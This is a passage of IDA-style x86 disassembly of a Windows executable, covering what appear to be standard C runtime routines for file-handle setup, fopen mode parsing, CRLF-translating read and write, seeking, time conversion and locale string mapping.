loc_41E831: ; CODE XREF: sub_41E72A+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41E8EC
cmp al, 0Dh
jz short loc_41E84D
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41E8DE
; ---------------------------------------------------------------------------
loc_41E84D: ; CODE XREF: sub_41E72A+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41E86B
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41E862
add [ebp+arg_8], 2
jmp short loc_41E8C0
; ---------------------------------------------------------------------------
loc_41E862: ; CODE XREF: sub_41E72A+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41E8DE
; ---------------------------------------------------------------------------
loc_41E86B: ; CODE XREF: sub_41E72A+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword ptr byte_424074
test eax, eax
jnz short loc_41E893
call GetLastError
test eax, eax
jnz short loc_41E8DA
loc_41E893: ; CODE XREF: sub_41E72A+15D�j
cmp [ebp+var_C], 0
jz short loc_41E8DA
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41E8B5
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41E8C0
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41E8DE
; ---------------------------------------------------------------------------
loc_41E8B5: ; CODE XREF: sub_41E72A+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41E8C5
cmp [ebp+var_1], 0Ah
jnz short loc_41E8C5
loc_41E8C0: ; CODE XREF: sub_41E72A+136�j
; sub_41E72A+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41E8DD
; ---------------------------------------------------------------------------
loc_41E8C5: ; CODE XREF: sub_41E72A+18E�j
; sub_41E72A+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41EACB
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41E8DE
loc_41E8DA: ; CODE XREF: sub_41E72A+167�j
; sub_41E72A+16D�j
mov byte ptr [edi], 0Dh
loc_41E8DD: ; CODE XREF: sub_41E72A+199�j
inc edi
loc_41E8DE: ; CODE XREF: sub_41E72A+11E�j
; sub_41E72A+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41E831
jmp short loc_41E8FC
; ---------------------------------------------------------------------------
loc_41E8EC: ; CODE XREF: sub_41E72A+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41E8FC
or al, 2
mov [esi], al
loc_41E8FC: ; CODE XREF: sub_41E72A+101�j
; sub_41E72A+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41E902: ; CODE XREF: sub_41E72A+DA�j
mov eax, [ebp+var_8]
jmp short loc_41E91B
; ---------------------------------------------------------------------------
loc_41E907: ; CODE XREF: sub_41E72A+12�j
; sub_41E72A+39�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
loc_41E918: ; CODE XREF: sub_41E72A+AB�j
; sub_41E72A+C3�j
or eax, 0FFFFFFFFh
loc_41E91B: ; CODE XREF: sub_41E72A+B7�j
; sub_41E72A+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E72A endp
; =============== S U B R O U T I N E =======================================
sub_41E920 proc near ; CODE XREF: .text:0041A3D5�p
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_418175
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41E940
push 1Bh ; NumberOfBytesWritten
call sub_41A45C
pop ecx
loc_41E940: ; CODE XREF: sub_41E920+16�j
mov dword ptr byte_445EDC+0D5924h, esi
mov dword ptr byte_445EDC+0D5A24h, 20h
lea eax, [esi+100h]
loc_41E956: ; CODE XREF: sub_41E920+52�j
cmp esi, eax
jnb short loc_41E974
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword ptr byte_445EDC+0D5924h
add esi, 8
add eax, 100h
jmp short loc_41E956
; ---------------------------------------------------------------------------
loc_41E974: ; CODE XREF: sub_41E920+38�j
lea eax, [esp+54h+StartupInfo]
push eax ; lpStartupInfo
call GetStartupInfoA ; GetStartupInfoA
cmp [esp+54h+StartupInfo.cbReserved2], 0
jz loc_41EA50
mov eax, [esp+54h+StartupInfo.lpReserved2]
test eax, eax
jz loc_41EA50
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41E9AA
mov esi, eax
loc_41E9AA: ; CODE XREF: sub_41E920+86�j
cmp dword ptr byte_445EDC+0D5A24h, esi
jge short loc_41EA04
mov edi, 51B804h
loc_41E9B7: ; CODE XREF: sub_41E920+DA�j
push 100h
call sub_418175
test eax, eax
pop ecx
jz short loc_41E9FE
add dword ptr byte_445EDC+0D5A24h, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41E9D5: ; CODE XREF: sub_41E920+CF�j
cmp eax, ecx
jnb short loc_41E9F1
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41E9D5
; ---------------------------------------------------------------------------
loc_41E9F1: ; CODE XREF: sub_41E920+B7�j
add edi, 4
cmp dword ptr byte_445EDC+0D5A24h, esi
jl short loc_41E9B7
jmp short loc_41EA04
; ---------------------------------------------------------------------------
loc_41E9FE: ; CODE XREF: sub_41E920+A4�j
mov esi, dword ptr byte_445EDC+0D5A24h
loc_41EA04: ; CODE XREF: sub_41E920+90�j
; sub_41E920+DC�j
xor edi, edi
test esi, esi
jle short loc_41EA50
loc_41EA0A: ; CODE XREF: sub_41E920+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41EA47
mov cl, [ebp+0]
test cl, 1
jz short loc_41EA47
test cl, 8
jnz short loc_41EA29
push eax ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_41EA47
loc_41EA29: ; CODE XREF: sub_41E920+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword ptr byte_445EDC+0D5924h[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41EA47: ; CODE XREF: sub_41E920+EF�j
; sub_41E920+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41EA0A
loc_41EA50: ; CODE XREF: sub_41E920+65�j
; sub_41E920+71�j ...
xor ebx, ebx
loc_41EA52: ; CODE XREF: sub_41E920+195�j
mov eax, dword ptr byte_445EDC+0D5924h
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41EAAD
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41EA6D
push 0FFFFFFF6h
pop eax
jmp short loc_41EA77
; ---------------------------------------------------------------------------
loc_41EA6D: ; CODE XREF: sub_41E920+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41EA77: ; CODE XREF: sub_41E920+14B�j
push eax ; nStdHandle
call GetStdHandle ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41EA9C
push edi ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_41EA9C
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41EAA2
loc_41EA9C: ; CODE XREF: sub_41E920+163�j
; sub_41E920+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41EAB1
; ---------------------------------------------------------------------------
loc_41EAA2: ; CODE XREF: sub_41E920+17A�j
cmp eax, 3
jnz short loc_41EAB1
or byte ptr [esi+4], 8
jmp short loc_41EAB1
; ---------------------------------------------------------------------------
loc_41EAAD: ; CODE XREF: sub_41E920+13E�j
or byte ptr [esi+4], 80h
loc_41EAB1: ; CODE XREF: sub_41E920+180�j
; sub_41E920+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41EA52
push dword ptr byte_445EDC+0D5A24h ; hResData
call LockResource ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_41E920 endp
; =============== S U B R O U T I N E =======================================
sub_41EACB proc near ; CODE XREF: sub_419049+20�p
; sub_419049+E2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword ptr byte_445EDC+0D5A24h
push esi
push edi
jnb short loc_41EB4D
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:51B800h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41EB4D
push eax
call sub_420D93
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41EB0F
mov dword ptr byte_445EDC+0D43E4h, 9
jmp short loc_41EB5E
; ---------------------------------------------------------------------------
loc_41EB0F: ; CODE XREF: sub_41EACB+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword ptr byte_4240B0+8
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41EB2F
call GetLastError
jmp short loc_41EB31
; ---------------------------------------------------------------------------
loc_41EB2F: ; CODE XREF: sub_41EACB+5A�j
xor eax, eax
loc_41EB31: ; CODE XREF: sub_41EACB+62�j
test eax, eax
jz short loc_41EB3E
push eax
call sub_41F64A
pop ecx
jmp short loc_41EB5E
; ---------------------------------------------------------------------------
loc_41EB3E: ; CODE XREF: sub_41EACB+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41EB61
; ---------------------------------------------------------------------------
loc_41EB4D: ; CODE XREF: sub_41EACB+D�j
; sub_41EACB+2A�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
loc_41EB5E: ; CODE XREF: sub_41EACB+42�j
; sub_41EACB+71�j
or eax, 0FFFFFFFFh
loc_41EB61: ; CODE XREF: sub_41EACB+80�j
pop edi
pop esi
pop ebx
retn
sub_41EACB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB65 proc near ; CODE XREF: sub_41922D+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword ptr byte_445EDC+0D45E8h
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41EB9E
cmp al, 72h
jz short loc_41EB97
cmp al, 77h
jnz loc_41ECB2
mov ecx, 301h
jmp short loc_41EBA3
; ---------------------------------------------------------------------------
loc_41EB97: ; CODE XREF: sub_41EB65+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41EBA6
; ---------------------------------------------------------------------------
loc_41EB9E: ; CODE XREF: sub_41EB65+1D�j
mov ecx, 109h
loc_41EBA3: ; CODE XREF: sub_41EB65+30�j
or esi, 2
loc_41EBA6: ; CODE XREF: sub_41EB65+37�j
push 1
pop edx
loc_41EBA9: ; CODE XREF: sub_41EB65+8B�j
; sub_41EB65+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41EC98
cmp edx, ebx
jz loc_41EC98
movsx eax, al
cmp eax, 54h
jg short loc_41EC37
jz short loc_41EC27
sub eax, 2Bh
jz short loc_41EC11
sub eax, 19h
jz short loc_41EC07
sub eax, 0Eh
jz short loc_41EBF2
dec eax
jnz loc_41EC89
cmp [ebp+var_4], ebx
jnz loc_41EC89
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EBF2: ; CODE XREF: sub_41EB65+6F�j
cmp [ebp+var_4], ebx
jnz loc_41EC89
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC07: ; CODE XREF: sub_41EB65+6A�j
test cl, 40h
jnz short loc_41EC89
or ecx, 40h
jmp short loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC11: ; CODE XREF: sub_41EB65+65�j
test cl, 2
jnz short loc_41EC89
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC27: ; CODE XREF: sub_41EB65+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41EC89
or ecx, eax
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC37: ; CODE XREF: sub_41EB65+5E�j
sub eax, 62h
jz short loc_41EC84
dec eax
jz short loc_41EC6D
sub eax, 0Bh
jz short loc_41EC56
sub eax, 6
jnz short loc_41EC89
test ch, 0C0h
jnz short loc_41EC89
or ch, 40h
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC56: ; CODE XREF: sub_41EB65+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41EC89
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC6D: ; CODE XREF: sub_41EB65+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41EC89
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC84: ; CODE XREF: sub_41EB65+D5�j
test ch, 0C0h
jz short loc_41EC90
loc_41EC89: ; CODE XREF: sub_41EB65+72�j
; sub_41EB65+7B�j ...
xor edx, edx
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC90: ; CODE XREF: sub_41EB65+122�j
or ch, 80h
jmp loc_41EBA9
; ---------------------------------------------------------------------------
loc_41EC98: ; CODE XREF: sub_41EB65+4A�j
; sub_41EB65+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_420E27
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41ECB6
loc_41ECB2: ; CODE XREF: sub_41EB65+25�j
xor eax, eax
jmp short loc_41ECD0
; ---------------------------------------------------------------------------
loc_41ECB6: ; CODE XREF: sub_41EB65+14B�j
mov eax, [ebp+arg_C]
inc dword ptr byte_445EDC+0D45A8h
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41ECD0: ; CODE XREF: sub_41EB65+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EB65 endp
; =============== S U B R O U T I N E =======================================
sub_41ECD5 proc near ; CODE XREF: sub_41922D�p
mov edx, dword ptr byte_445EDC+0D56E4h
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41ED46
mov ebx, dword ptr byte_445EDC+0D46DCh
mov edi, ebx
loc_41ECF1: ; CODE XREF: sub_41ECD5+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41ED0C
test byte ptr [ecx+0Ch], 83h
jz short loc_41ED07
inc eax
add edi, 4
cmp eax, edx
jl short loc_41ECF1
jmp short loc_41ED46
; ---------------------------------------------------------------------------
loc_41ED07: ; CODE XREF: sub_41ECD5+26�j
mov esi, [ebx+eax*4]
jmp short loc_41ED30
; ---------------------------------------------------------------------------
loc_41ED0C: ; CODE XREF: sub_41ECD5+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_418175
pop ecx
mov ecx, dword ptr byte_445EDC+0D46DCh
mov [edi+ecx], eax
mov eax, dword ptr byte_445EDC+0D46DCh
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41ED46
mov esi, edi
loc_41ED30: ; CODE XREF: sub_41ECD5+35�j
cmp esi, ebp
jz short loc_41ED46
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41ED46: ; CODE XREF: sub_41ECD5+12�j
; sub_41ECD5+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41ECD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED4D proc near ; CODE XREF: sub_419597+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41EE09
cmp ebx, 8Ah
jg loc_41EE09
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword ptr unk_4407E4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41ED8C
cmp edi, 2
jle short loc_41ED8C
inc esi
loc_41ED8C: ; CODE XREF: sub_41ED4D+37�j
; sub_41ED4D+3C�j
call sub_4210E0
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword ptr unk_440700
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41EDFF
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41EE05
cmp dword ptr unk_440704, 0
jz short loc_41EE05
lea eax, [ebp+var_24]
push eax
call sub_421353
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41EE05
loc_41EDFF: ; CODE XREF: sub_41ED4D+90�j
add ecx, dword ptr unk_440708
loc_41EE05: ; CODE XREF: sub_41ED4D+96�j
; sub_41ED4D+9F�j ...
mov eax, ecx
jmp short loc_41EE0C
; ---------------------------------------------------------------------------
loc_41EE09: ; CODE XREF: sub_41ED4D+13�j
; sub_41ED4D+1F�j
or eax, 0FFFFFFFFh
loc_41EE0C: ; CODE XREF: sub_41ED4D+BA�j
pop ebx
leave
retn
sub_41ED4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41EE0F(LCID Locale, DWORD dwMapFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPSTR lpDestStr, int cchDest, UINT CodePage, int)
sub_41EE0F proc near ; CODE XREF: sub_4197A3+47�p
; sub_4197A3+74�p ...
var_28 = dword ptr -28h
lpSrcStr = dword ptr -24h
var_20 = dword ptr -20h
cchSrc = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwMapFlags = dword ptr 0Ch
lpMultiByteStr = dword ptr 10h
cbMultiByte = dword ptr 14h
lpDestStr = dword ptr 18h
cchDest = dword ptr 1Ch
CodePage = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 4248C8h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword ptr byte_445EDC+0D4468h, edi
jnz short loc_41EE85
push edi ; cchDest
push edi ; lpDestStr
push 1
pop ebx
push ebx ; cchSrc
push offset SrcStr ; lpSrcStr
mov esi, 100h
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_41EE63
mov dword ptr byte_445EDC+0D4468h, ebx
jmp short loc_41EE85
; ---------------------------------------------------------------------------
loc_41EE63: ; CODE XREF: sub_41EE0F+4A�j
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push offset byte_440FAC ; lpSrcStr
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringA ; LCMapStringA
test eax, eax
jz loc_41EF9D
mov dword ptr byte_445EDC+0D4468h, 2
loc_41EE85: ; CODE XREF: sub_41EE0F+2E�j
; sub_41EE0F+52�j
cmp [ebp+cbMultiByte], edi
jle short loc_41EE9A
push [ebp+cbMultiByte]
push [ebp+lpMultiByteStr]
call sub_422A89
pop ecx
pop ecx
mov [ebp+cbMultiByte], eax
loc_41EE9A: ; CODE XREF: sub_41EE0F+79�j
mov eax, dword ptr byte_445EDC+0D4468h
cmp eax, 2
jnz short loc_41EEC1
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringA ; LCMapStringA
jmp loc_41EF9F
; ---------------------------------------------------------------------------
loc_41EEC1: ; CODE XREF: sub_41EE0F+93�j
cmp eax, 1
jnz loc_41EF9D
cmp [ebp+CodePage], edi
jnz short loc_41EED7
mov eax, dword ptr byte_445EDC+0D4484h
mov [ebp+CodePage], eax
loc_41EED7: ; CODE XREF: sub_41EE0F+BE�j
push edi ; cchWideChar
push edi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov ebx, eax
mov [ebp+cchSrc], ebx
cmp ebx, edi
jz loc_41EF9D
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41EF32
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+lpSrcStr], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+cchSrc]
loc_41EF32: ; CODE XREF: sub_41EE0F+10E�j
cmp [ebp+lpSrcStr], edi
jz short loc_41EF9D
push ebx ; cchWideChar
push [ebp+lpSrcStr] ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jz short loc_41EF9D
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41EF9D
test byte ptr [ebp+dwMapFlags+1], 4
jz short loc_41EFB1
cmp [ebp+cchDest], edi
jz loc_41F02C
cmp esi, [ebp+cchDest]
jg short loc_41EF9D
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jnz loc_41F02C
loc_41EF9D: ; CODE XREF: sub_41EE0F+66�j
; sub_41EE0F+B5�j ...
xor eax, eax
loc_41EF9F: ; CODE XREF: sub_41EE0F+AD�j
; sub_41EE0F+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41EFB1: ; CODE XREF: sub_41EE0F+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41EFE5
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41EFE5: ; CODE XREF: sub_41EE0F+1C2�j
cmp ebx, edi
jz short loc_41EF9D
push esi ; cchDest
push ebx ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_41EF9D
cmp [ebp+cchDest], edi
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
jnz short loc_41F00C
push edi
push edi
jmp short loc_41F012
; ---------------------------------------------------------------------------
loc_41F00C: ; CODE XREF: sub_41EE0F+1F7�j
push [ebp+cchDest] ; cbMultiByte
push [ebp+lpDestStr] ; lpMultiByteStr
loc_41F012: ; CODE XREF: sub_41EE0F+1FB�j
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41EF9D
loc_41F02C: ; CODE XREF: sub_41EE0F+165�j
; sub_41EE0F+188�j
mov eax, esi
jmp loc_41EF9F
sub_41EE0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41F033(int, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
sub_41F033 proc near ; CODE XREF: sub_41990C+A2�p
; sub_41A4A5+95�p ...
Buffer = byte ptr -414h
var_10 = dword ptr -10h
NumberOfBytesWritten= dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpBuffer = dword ptr 0Ch
nNumberOfBytesToWrite= dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword ptr byte_445EDC+0D5A24h
push esi
push edi
jnb loc_41F1C7
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:51B800h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41F1C7
xor edi, edi
cmp [ebp+nNumberOfBytesToWrite], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41F084
loc_41F07D: ; CODE XREF: sub_41F033+177�j
xor eax, eax
jmp loc_41F1DB
; ---------------------------------------------------------------------------
loc_41F084: ; CODE XREF: sub_41F033+48�j
test al, 20h
jz short loc_41F094
push 2
push edi
push ecx
call sub_41EACB
add esp, 0Ch
loc_41F094: ; CODE XREF: sub_41F033+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41F163
mov eax, [ebp+lpBuffer]
cmp [ebp+nNumberOfBytesToWrite], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41F19B
loc_41F0B4: ; CODE XREF: sub_41F033+F5�j
lea eax, [ebp+Buffer]
loc_41F0BA: ; CODE XREF: sub_41F033+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+lpBuffer]
cmp ecx, [ebp+nNumberOfBytesToWrite]
jnb short loc_41F0EE
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41F0D9
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41F0D9: ; CODE XREF: sub_41F033+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+Buffer]
sub ecx, edx
cmp ecx, 400h
jl short loc_41F0BA
loc_41F0EE: ; CODE XREF: sub_41F033+90�j
mov edi, eax
lea eax, [ebp+Buffer]
sub edi, eax
lea eax, [ebp+NumberOfBytesWritten]
push 0 ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
mov eax, [ebx]
push dword ptr [eax+esi] ; hFile
call WriteFile ; WriteFile
test eax, eax
jz short loc_41F158
mov eax, [ebp+NumberOfBytesWritten]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41F12A
mov eax, [ebp+var_4]
sub eax, [ebp+lpBuffer]
cmp eax, [ebp+nNumberOfBytesToWrite]
jb short loc_41F0B4
loc_41F12A: ; CODE XREF: sub_41F033+EA�j
; sub_41F033+12E�j
xor edi, edi
loc_41F12C: ; CODE XREF: sub_41F033+150�j
; sub_41F033+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41F1C2
cmp [ebp+arg_0], edi
jz short loc_41F19B
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41F190
mov dword ptr byte_445EDC+0D43E4h, 9
mov dword ptr byte_445EDC+0D43E8h, eax
jmp loc_41F1D8
